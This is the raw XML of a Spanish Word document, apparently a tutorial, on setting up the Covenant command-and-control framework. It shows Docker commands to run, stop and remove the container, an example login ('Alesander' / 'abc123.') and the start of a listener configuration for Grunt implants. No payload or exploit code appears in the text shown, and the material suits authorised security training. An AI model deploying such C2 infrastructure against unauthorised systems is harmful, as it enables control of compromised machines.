                          <w:p w14:paraId="5947F101" w14:textId="2F1A8BE9" w:rsidR="00F725BF" w:rsidRDefault="00F725BF">
                            <w:r>
                              <w:t>Para volver a iniciarlo sin crear un nuevo contenedor usaremos:</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="586F3C41" w14:textId="77777777" w:rsidR="00F725BF" w:rsidRDefault="00F725BF" w:rsidP="00F725BF">
                            <w:pPr>
                              <w:pStyle w:val="HTMLconformatoprevio"/>
                              <w:rPr>
                                <w:rStyle w:val="CdigoHTML"/>
                                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                                <w:color w:val="1F2328"/>
                                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                              </w:rPr>
                            </w:pPr>
                            <w:r>
                              <w:rPr>
                                <w:rStyle w:val="CdigoHTML"/>
                                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                                <w:color w:val="1F2328"/>
                                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                              </w:rPr>
                              <w:t>docker start covenant -ai</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="47D1AEDB" w14:textId="77777777" w:rsidR="00F725BF" w:rsidRDefault="00F725BF" w:rsidP="00F725BF">
                            <w:pPr>
                              <w:pStyle w:val="HTMLconformatoprevio"/>
                              <w:rPr>
                                <w:rStyle w:val="CdigoHTML"/>
                                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                                <w:color w:val="1F2328"/>
                                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                              </w:rPr>
                            </w:pPr>
                          </w:p>
                          <w:p w14:paraId="443E4276" w14:textId="0B7D71E8" w:rsidR="00F725BF" w:rsidRDefault="00F725BF" w:rsidP="00F725BF">
                            <w:pPr>
                              <w:pStyle w:val="HTMLconformatoprevio"/>
                              <w:rPr>
                                <w:rStyle w:val="CdigoHTML"/>
                                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                                <w:color w:val="1F2328"/>
                                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                              </w:rPr>
                            </w:pPr>
                            <w:r>
                              <w:rPr>
                                <w:rStyle w:val="CdigoHTML"/>
                                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                                <w:color w:val="1F2328"/>
                                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                              </w:rPr>
                              <w:t>Para cerrarlo:</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="78AF1021" w14:textId="77777777" w:rsidR="00F725BF" w:rsidRDefault="00F725BF" w:rsidP="00F725BF">
                            <w:pPr>
                              <w:pStyle w:val="HTMLconformatoprevio"/>
                              <w:rPr>
                                <w:rStyle w:val="CdigoHTML"/>
                                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                                <w:color w:val="1F2328"/>
                                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                              </w:rPr>
                            </w:pPr>
                          </w:p>
                          <w:p w14:paraId="1FA9DFF1" w14:textId="77777777" w:rsidR="00F725BF" w:rsidRDefault="00F725BF" w:rsidP="00F725BF">
                            <w:pPr>
                              <w:pStyle w:val="HTMLconformatoprevio"/>
                              <w:rPr>
                                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                                <w:color w:val="1F2328"/>
                              </w:rPr>
                            </w:pPr>
                            <w:r>
                              <w:rPr>
                                <w:rStyle w:val="CdigoHTML"/>
                                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                                <w:color w:val="1F2328"/>
                                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                              </w:rPr>
                              <w:t>docker stop covenant</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="06EBD00A" w14:textId="77777777" w:rsidR="00F725BF" w:rsidRDefault="00F725BF" w:rsidP="00F725BF">
                            <w:pPr>
                              <w:pStyle w:val="HTMLconformatoprevio"/>
                              <w:rPr>
                                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                                <w:color w:val="1F2328"/>
                              </w:rPr>
                            </w:pPr>
                          </w:p>
                          <w:p w14:paraId="2EC2DB52" w14:textId="77777777" w:rsidR="00F725BF" w:rsidRDefault="00F725BF" w:rsidP="00F725BF">
                            <w:pPr>
                              <w:pStyle w:val="HTMLconformatoprevio"/>
                              <w:rPr>
                                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                                <w:color w:val="1F2328"/>
                              </w:rPr>
                            </w:pPr>
                          </w:p>
                          <w:p w14:paraId="243A1247" w14:textId="7CE1ADEF" w:rsidR="00F725BF" w:rsidRDefault="00F725BF" w:rsidP="00F725BF">
                            <w:pPr>
                              <w:pStyle w:val="HTMLconformatoprevio"/>
                              <w:rPr>
                                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                                <w:color w:val="1F2328"/>
                              </w:rPr>
                            </w:pPr>
                            <w:r>
                              <w:rPr>
                                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                                <w:color w:val="1F2328"/>
                              </w:rPr>
                              <w:t>Y para borrarlo:</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="79CA887E" w14:textId="77777777" w:rsidR="00F725BF" w:rsidRDefault="00F725BF" w:rsidP="00F725BF">
                            <w:pPr>
                              <w:pStyle w:val="HTMLconformatoprevio"/>
                              <w:rPr>
                                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                                <w:color w:val="1F2328"/>
                              </w:rPr>
                            </w:pPr>
                          </w:p>
                          <w:p w14:paraId="0CE0CC73" w14:textId="77777777" w:rsidR="00F725BF" w:rsidRDefault="00F725BF" w:rsidP="00F725BF">
                            <w:pPr>
                              <w:pStyle w:val="HTMLconformatoprevio"/>
                              <w:rPr>
                                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                                <w:color w:val="1F2328"/>
                              </w:rPr>
                            </w:pPr>
                            <w:r>
                              <w:rPr>
                                <w:rStyle w:val="CdigoHTML"/>
                                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                                <w:color w:val="1F2328"/>
                                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                              </w:rPr>
                              <w:t>docker rm covenant</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="4C2FF4E2" w14:textId="77777777" w:rsidR="00F725BF" w:rsidRDefault="00F725BF" w:rsidP="00F725BF">
                            <w:pPr>
                              <w:pStyle w:val="HTMLconformatoprevio"/>
                              <w:rPr>
                                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                                <w:color w:val="1F2328"/>
                              </w:rPr>
                            </w:pPr>
                          </w:p>
                          <w:p w14:paraId="24A30107" w14:textId="0A4C70B8" w:rsidR="00F725BF" w:rsidRDefault="00F725BF" w:rsidP="00F725BF">
                            <w:pPr>
                              <w:pStyle w:val="HTMLconformatoprevio"/>
                              <w:rPr>
                                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                                <w:color w:val="1F2328"/>
                              </w:rPr>
                            </w:pPr>
                          </w:p>
                          <w:p w14:paraId="64A6997F" w14:textId="77777777" w:rsidR="00F725BF" w:rsidRDefault="00F725B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B67B3E" id="_x0000_s1064" type="#_x0000_t202" style="position:absolute;margin-left:0;margin-top:14.4pt;width:185.9pt;height:110.6pt;z-index:2517217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&#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CUN8dO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3109B759" w14:textId="138E847C" w:rsidR="00F725BF" w:rsidRDefault="00F725BF">
                      <w:r w:rsidRPr="00F725BF">
                        <w:t>$ ~/Covenant/Covenant &gt; docker run -it -p 7443:7443 -p 80:80 -p 443:443 --name covenant -v &lt;/absolute/path/to/Covenant/Covenant/Data&gt;:/app/Data covenant</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="2803784D" w14:textId="77777777" w:rsidR="00F725BF" w:rsidRDefault="00F725BF"/>
                    <w:p w14:paraId="09735F5E" w14:textId="045DB2BD" w:rsidR="00F725BF" w:rsidRDefault="00F725BF">
                      <w:r>
                        <w:t>Habría que cambiar &lt;/absoluete/path/to/Coveneant/Data&gt; por nuestra ruta a esa carpeta, que en mi caso será:</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="7850BAF4" w14:textId="580665A4" w:rsidR="00F725BF" w:rsidRDefault="00F725BF">
                      <w:r w:rsidRPr="00F725BF">
                        <w:t>/home/parrot/Programas/Covenant/Covenant/Data:/app/Data</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="32DFCE2F" w14:textId="28763CE4" w:rsidR="00F725BF" w:rsidRDefault="00F725BF">
                      <w:r>
                        <w:t>Con esto ya se iniciará.</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="5947F101" w14:textId="2F1A8BE9" w:rsidR="00F725BF" w:rsidRDefault="00F725BF">
                      <w:r>
                        <w:t>Para volver a iniciarlo sin crear un nuevo contenedor usaremos:</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="586F3C41" w14:textId="77777777" w:rsidR="00F725BF" w:rsidRDefault="00F725BF" w:rsidP="00F725BF">
                      <w:pPr>
                        <w:pStyle w:val="HTMLconformatoprevio"/>
                        <w:rPr>
                          <w:rStyle w:val="CdigoHTML"/>
                          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                          <w:color w:val="1F2328"/>
                          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                        </w:rPr>
                      </w:pPr>
                      <w:r>
                        <w:rPr>
                          <w:rStyle w:val="CdigoHTML"/>
                          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                          <w:color w:val="1F2328"/>
                          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                        </w:rPr>
                        <w:t>docker start covenant -ai</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="47D1AEDB" w14:textId="77777777" w:rsidR="00F725BF" w:rsidRDefault="00F725BF" w:rsidP="00F725BF">
                      <w:pPr>
                        <w:pStyle w:val="HTMLconformatoprevio"/>
                        <w:rPr>
                          <w:rStyle w:val="CdigoHTML"/>
                          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                          <w:color w:val="1F2328"/>
                          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                        </w:rPr>
                      </w:pPr>
                    </w:p>
                    <w:p w14:paraId="443E4276" w14:textId="0B7D71E8" w:rsidR="00F725BF" w:rsidRDefault="00F725BF" w:rsidP="00F725BF">
                      <w:pPr>
                        <w:pStyle w:val="HTMLconformatoprevio"/>
                        <w:rPr>
                          <w:rStyle w:val="CdigoHTML"/>
                          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                          <w:color w:val="1F2328"/>
                          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                        </w:rPr>
                      </w:pPr>
                      <w:r>
                        <w:rPr>
                          <w:rStyle w:val="CdigoHTML"/>
                          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                          <w:color w:val="1F2328"/>
                          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                        </w:rPr>
                        <w:t>Para cerrarlo:</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="78AF1021" w14:textId="77777777" w:rsidR="00F725BF" w:rsidRDefault="00F725BF" w:rsidP="00F725BF">
                      <w:pPr>
                        <w:pStyle w:val="HTMLconformatoprevio"/>
                        <w:rPr>
                          <w:rStyle w:val="CdigoHTML"/>
                          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                          <w:color w:val="1F2328"/>
                          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                        </w:rPr>
                      </w:pPr>
                    </w:p>
                    <w:p w14:paraId="1FA9DFF1" w14:textId="77777777" w:rsidR="00F725BF" w:rsidRDefault="00F725BF" w:rsidP="00F725BF">
                      <w:pPr>
                        <w:pStyle w:val="HTMLconformatoprevio"/>
                        <w:rPr>
                          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                          <w:color w:val="1F2328"/>
                        </w:rPr>
                      </w:pPr>
                      <w:r>
                        <w:rPr>
                          <w:rStyle w:val="CdigoHTML"/>
                          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                          <w:color w:val="1F2328"/>
                          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                        </w:rPr>
                        <w:t>docker stop covenant</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="06EBD00A" w14:textId="77777777" w:rsidR="00F725BF" w:rsidRDefault="00F725BF" w:rsidP="00F725BF">
                      <w:pPr>
                        <w:pStyle w:val="HTMLconformatoprevio"/>
                        <w:rPr>
                          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                          <w:color w:val="1F2328"/>
                        </w:rPr>
                      </w:pPr>
                    </w:p>
                    <w:p w14:paraId="2EC2DB52" w14:textId="77777777" w:rsidR="00F725BF" w:rsidRDefault="00F725BF" w:rsidP="00F725BF">
                      <w:pPr>
                        <w:pStyle w:val="HTMLconformatoprevio"/>
                        <w:rPr>
                          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                          <w:color w:val="1F2328"/>
                        </w:rPr>
                      </w:pPr>
                    </w:p>
                    <w:p w14:paraId="243A1247" w14:textId="7CE1ADEF" w:rsidR="00F725BF" w:rsidRDefault="00F725BF" w:rsidP="00F725BF">
                      <w:pPr>
                        <w:pStyle w:val="HTMLconformatoprevio"/>
                        <w:rPr>
                          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                          <w:color w:val="1F2328"/>
                        </w:rPr>
                      </w:pPr>
                      <w:r>
                        <w:rPr>
                          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                          <w:color w:val="1F2328"/>
                        </w:rPr>
                        <w:t>Y para borrarlo:</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="79CA887E" w14:textId="77777777" w:rsidR="00F725BF" w:rsidRDefault="00F725BF" w:rsidP="00F725BF">
                      <w:pPr>
                        <w:pStyle w:val="HTMLconformatoprevio"/>
                        <w:rPr>
                          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                          <w:color w:val="1F2328"/>
                        </w:rPr>
                      </w:pPr>
                    </w:p>
                    <w:p w14:paraId="0CE0CC73" w14:textId="77777777" w:rsidR="00F725BF" w:rsidRDefault="00F725BF" w:rsidP="00F725BF">
                      <w:pPr>
                        <w:pStyle w:val="HTMLconformatoprevio"/>
                        <w:rPr>
                          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                          <w:color w:val="1F2328"/>
                        </w:rPr>
                      </w:pPr>
                      <w:r>
                        <w:rPr>
                          <w:rStyle w:val="CdigoHTML"/>
                          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                          <w:color w:val="1F2328"/>
                          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                        </w:rPr>
                        <w:t>docker rm covenant</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="4C2FF4E2" w14:textId="77777777" w:rsidR="00F725BF" w:rsidRDefault="00F725BF" w:rsidP="00F725BF">
                      <w:pPr>
                        <w:pStyle w:val="HTMLconformatoprevio"/>
                        <w:rPr>
                          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                          <w:color w:val="1F2328"/>
                        </w:rPr>
                      </w:pPr>
                    </w:p>
                    <w:p w14:paraId="24A30107" w14:textId="0A4C70B8" w:rsidR="00F725BF" w:rsidRDefault="00F725BF" w:rsidP="00F725BF">
                      <w:pPr>
                        <w:pStyle w:val="HTMLconformatoprevio"/>
                        <w:rPr>
                          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                          <w:color w:val="1F2328"/>
                        </w:rPr>
                      </w:pPr>
                    </w:p>
                    <w:p w14:paraId="64A6997F" w14:textId="77777777" w:rsidR="00F725BF" w:rsidRDefault="00F725BF"/>
                  </w:txbxContent>
                </v:textbox>
                <w10:wrap type="square"/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
    </w:p>
    <w:p w14:paraId="7577FCE8" w14:textId="77777777" w:rsidR="00F725BF" w:rsidRDefault="00F725BF" w:rsidP="00F725BF">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="66BE579F" w14:textId="77777777" w:rsidR="00F725BF" w:rsidRDefault="00F725BF" w:rsidP="00F725BF">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="08137C9B" w14:textId="77777777" w:rsidR="00F725BF" w:rsidRDefault="00F725BF" w:rsidP="00F725BF">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0BD3B376" w14:textId="77777777" w:rsidR="00F725BF" w:rsidRDefault="00F725BF" w:rsidP="00F725BF">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="182830FD" w14:textId="77777777" w:rsidR="00F725BF" w:rsidRDefault="00F725BF" w:rsidP="00F725BF">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7622FA18" w14:textId="77777777" w:rsidR="00F725BF" w:rsidRDefault="00F725BF" w:rsidP="00F725BF">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="00AD330A" w14:textId="77777777" w:rsidR="00F725BF" w:rsidRDefault="00F725BF" w:rsidP="00F725BF">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7B5359AA" w14:textId="77777777" w:rsidR="00F725BF" w:rsidRDefault="00F725BF" w:rsidP="00F725BF">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7288322A" w14:textId="77777777" w:rsidR="00F725BF" w:rsidRDefault="00F725BF" w:rsidP="00F725BF">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="142AB811" w14:textId="77777777" w:rsidR="00F725BF" w:rsidRDefault="00F725BF" w:rsidP="00F725BF">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5A10377A" w14:textId="77777777" w:rsidR="00F725BF" w:rsidRDefault="00F725BF" w:rsidP="00F725BF">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4F37235F" w14:textId="77777777" w:rsidR="00F725BF" w:rsidRDefault="00F725BF" w:rsidP="00F725BF">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="009E219C" w14:textId="77777777" w:rsidR="00F725BF" w:rsidRDefault="00F725BF" w:rsidP="00F725BF">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="297D0992" w14:textId="77777777" w:rsidR="00F725BF" w:rsidRDefault="00F725BF" w:rsidP="00F725BF">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="33344638" w14:textId="77777777" w:rsidR="00F725BF" w:rsidRDefault="00F725BF" w:rsidP="00F725BF">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1EC0F85C" w14:textId="77777777" w:rsidR="00F725BF" w:rsidRDefault="00F725BF" w:rsidP="00F725BF">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0AA82100" w14:textId="77777777" w:rsidR="00F725BF" w:rsidRDefault="00F725BF" w:rsidP="00F725BF">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="701CF970" w14:textId="77777777" w:rsidR="00F725BF" w:rsidRDefault="00F725BF" w:rsidP="00F725BF">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0DE9D7C2" w14:textId="77777777" w:rsidR="00F725BF" w:rsidRDefault="00F725BF" w:rsidP="00F725BF">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="25136C46" w14:textId="77777777" w:rsidR="00F725BF" w:rsidRDefault="00F725BF" w:rsidP="00F725BF">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6C3620C0" w14:textId="77777777" w:rsidR="00F725BF" w:rsidRDefault="00F725BF" w:rsidP="00F725BF">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7706270B" w14:textId="77777777" w:rsidR="00F725BF" w:rsidRDefault="00F725BF" w:rsidP="00F725BF">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="30CA8462" w14:textId="77777777" w:rsidR="00F725BF" w:rsidRDefault="00F725BF" w:rsidP="00F725BF">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="57045F94" w14:textId="77777777" w:rsidR="00F725BF" w:rsidRDefault="00F725BF" w:rsidP="00F725BF">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="184B048B" w14:textId="77777777" w:rsidR="00F725BF" w:rsidRDefault="00F725BF" w:rsidP="00F725BF">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="509F2307" w14:textId="77777777" w:rsidR="00F725BF" w:rsidRDefault="00F725BF" w:rsidP="00F725BF">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="64F5A7B8" w14:textId="77777777" w:rsidR="00ED3279" w:rsidRDefault="00ED3279" w:rsidP="00F725BF">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="33EF5BE7" w14:textId="77777777" w:rsidR="00ED3279" w:rsidRDefault="00ED3279" w:rsidP="00F725BF">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="65B47A3D" w14:textId="77777777" w:rsidR="00ED3279" w:rsidRDefault="00ED3279" w:rsidP="00F725BF">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="55B6788F" w14:textId="77777777" w:rsidR="00F525FE" w:rsidRDefault="00F525FE" w:rsidP="00F725BF">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="170B054F" w14:textId="77777777" w:rsidR="00F525FE" w:rsidRDefault="00F525FE" w:rsidP="00F725BF">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1BADBE28" w14:textId="77777777" w:rsidR="00F525FE" w:rsidRDefault="00F525FE" w:rsidP="00F725BF">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="28EA07AC" w14:textId="682CDA20" w:rsidR="00CC2C59" w:rsidRDefault="00ED3279" w:rsidP="00F525FE">
      <w:pPr>
        <w:pStyle w:val="Ttulo2"/>
      </w:pPr>
      <w:bookmarkStart w:id="42" w:name="_Toc135575999"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Uso:</w:t>
      </w:r>
      <w:bookmarkEnd w:id="42"/>
    </w:p>
    <w:p w14:paraId="53982327" w14:textId="77777777" w:rsidR="00CC2C59" w:rsidRDefault="00CC2C59" w:rsidP="001F5E0C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="481B4892" w14:textId="285DE7DF" w:rsidR="00CC2C59" w:rsidRDefault="00CC2C59" w:rsidP="001F5E0C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
      <w:r>
        <w:t>Ahora tendremos que crear una cuenta:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35C1623B" w14:textId="77777777" w:rsidR="00CC2C59" w:rsidRDefault="00CC2C59" w:rsidP="001F5E0C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="43D2FE11" w14:textId="15E4B841" w:rsidR="00CC2C59" w:rsidRDefault="00CC2C59" w:rsidP="001F5E0C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="027D46FF" wp14:editId="0525DC6F">
            <wp:extent cx="5400040" cy="2719705"/>
            <wp:effectExtent l="0" t="0" r="0" b="4445"/>
            <wp:docPr id="1349047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7617" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId266"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71BF6555" w14:textId="77777777" w:rsidR="00CC2C59" w:rsidRDefault="00CC2C59" w:rsidP="001F5E0C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3A580F85" w14:textId="2C8F8D52" w:rsidR="00CC2C59" w:rsidRDefault="00CC2C59" w:rsidP="001F5E0C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
      <w:r>
        <w:t>Será el usuario ‘Alesander’ con contraseña ‘abc123.’ .</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55C3A6A3" w14:textId="77777777" w:rsidR="00CC2C59" w:rsidRDefault="00CC2C59" w:rsidP="001F5E0C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="25D2C348" w14:textId="097580BE" w:rsidR="00CC2C59" w:rsidRDefault="008D5524" w:rsidP="001F5E0C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
      <w:r>
        <w:t>Entrando dentro de la aplicación:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4352D12E" w14:textId="77777777" w:rsidR="008D5524" w:rsidRDefault="008D5524" w:rsidP="001F5E0C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4E061B35" w14:textId="6BB4B921" w:rsidR="008D5524" w:rsidRDefault="008D5524" w:rsidP="001F5E0C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0F2F270B" wp14:editId="71036D84">
            <wp:extent cx="5400040" cy="2719705"/>
            <wp:effectExtent l="0" t="0" r="0" b="4445"/>
            <wp:docPr id="84224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422" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId267"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6A2589A8" w14:textId="77777777" w:rsidR="008D5524" w:rsidRDefault="008D5524" w:rsidP="001F5E0C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="65C2081C" w14:textId="77777777" w:rsidR="00E10738" w:rsidRDefault="00E10738" w:rsidP="001F5E0C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="174C517C" w14:textId="1B8F6150" w:rsidR="00E10738" w:rsidRDefault="00E10738" w:rsidP="001F5E0C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Ahora tendremos que configurar un oyente, los oyentes permiten que los </w:t>
      </w:r>
      <w:r w:rsidR="00D62AA6">
        <w:t>G</w:t>
      </w:r>
      <w:r>
        <w:t>runts se comuniquen con la aplicación de Covenant. No hay ningún oyente configurado por defecto, por lo que deberemos configurar uno,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="029C8AF2" w14:textId="7E380CF6" w:rsidR="00E10738" w:rsidRDefault="00E10738" w:rsidP="001F5E0C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Para esto habrá que hacer </w:t>
      </w:r>
      <w:r w:rsidR="00D62AA6">
        <w:t>clic</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> en oyentes en el menú de la izquierda para abrir la página de oyentes.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6823925E" w14:textId="77777777" w:rsidR="00E10738" w:rsidRDefault="00E10738" w:rsidP="001F5E0C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
